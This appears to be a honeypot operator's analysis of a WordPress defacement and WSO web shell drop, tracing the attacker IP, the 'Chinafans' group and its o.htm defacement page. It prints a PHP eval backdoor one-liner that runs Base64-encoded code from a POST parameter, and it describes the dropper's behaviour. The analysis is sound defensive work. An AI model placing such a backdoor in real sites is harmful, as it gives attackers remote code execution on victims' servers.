A defacement that preceded a WSO download from the same IP address by about an hour.
| Defacement | 2019-08-31T05:02:25.356-06:00 | /wp-content/themes/twentytwelve/404.php |
| WSO download | 2019-08-31T05:55:41.59-06:00 | /wp-content/themes/twentytwelve/404.php |
Apparently, the attacker(s) thought they were sending Base64-encoded PHP source code to an immediate eval backdoor. This backdoor clearly evaluated code in an HTTP parameter named "520". The WSO shell download went to an immediate eval backdoor that used an HTTP parameter named "dd" for the same purpose. The attackers used the same URL for both downloads, which does not reconcile with 2 different names for the HTTP parameter containing PHP code to eval.
This is the same IP address from which a WSO web shell download was downloaded to my WordPress honey pot.
113.244.245.160 has no DNS name. It belongs to Chinanet:
inetnum: 113.240.0.0 - 113.247.255.255
netname: CHINANET-HN
descr: CHINANET HUNAN PROVINCE NETWORK
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
The PHP code sent to the backdoor is just a one-liner:
@eval(base64_decode($_POST[z0]));
HTTP parameter named "z0" contained Base64-encoded PHP that:
- Base64-decodes a file name "SCRIPT_FILENAMEZ:://o.htm" from HTTP parameter named "z1"
- Base64-decodes an HTML file
- Tries to write the HTML file to the file name "SCRIPT_FILENAMEZ:://o.htm"
This is quite similar to the follow-up web shell installation.
I'm still confused by the "SCRIPT_FILENAMEZ:://o.htm".
The PHP uses fwrite() to try to write the HTML to "SCRIPT_FILENAMEZ:://o.htm".
On a compromised Linux machine,
unless a directory named "SCRIPT_FILENAMEZ::" already exits,
the fwrite() of the HTML will fail.
On a compromised Windows machine, I think that file name
is not allowed due to containing ":" and "/" characters,
which I believe are disallowed in Windows file names.
There is no obfuscation involved.
Once dropped and subsequently remotely invoked,
the file o.htm advertises a "Chinafans" hacking group.
The HTML apparently wants a Youtube video, https://www.youtube.com/embed/bM7SZ5SBzyY?autoplay=1, to play when the "o.htm" file is referenced. That video no longer exists.
o.htm also wants to run a JavaScript file,
/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js,
but the URL doesn't reference a host name,
so email-decode.min.js has to exist locally, or nothing happens.
The image referenced by the HTML is http://pic.sc.chinaz.com/files/pic/pic9/201606/fpic5084.jpg
pic.sc.chinaz.com has a canonical name of "pic.sc.chinaz.com.w.kunlungr.com", and an IP address of 116.207.118.74.
The chinaz.com domain name is registered via ename.com, and no client info is provided.
116.207.118.74 is a CHINANET Hubei provice network address:
inetnum: 116.207.0.0 - 116.207.255.255
netname: CHINANET-HB
descr: CHINANET Hubei province network
descr: Data Communication Division
descr: China Telecom
country: CN
"kunlungr.com" is an Alibaba registered domain. Of course, client info is missing.
The twitter handle 0xfans is mostly in Chinese characters, and claims a given name of "0x1996". It has a few tweets indicting they're a hacking crew.
big shell Team
A large Hacking Team in China
Looking for a foreign friend hacker
Form a strong attack team
http://zone-h.org/archive/notifier=chinafans
There's also a little image posted:
There's a "Very six" hotel somewhere in South Korea, and the web is full of "very six" phrases that seem to mostly be misspellings of "very sexy".
The 0xfans Twitter handle references their Zone-H defacement archive:
The "SCRIPT_FILENAMEZ:://o.htm" filename must work under some circumstances. They list Windows, Linux and FreeBSD machines as defaced. The "o.htm" filename seems consistent.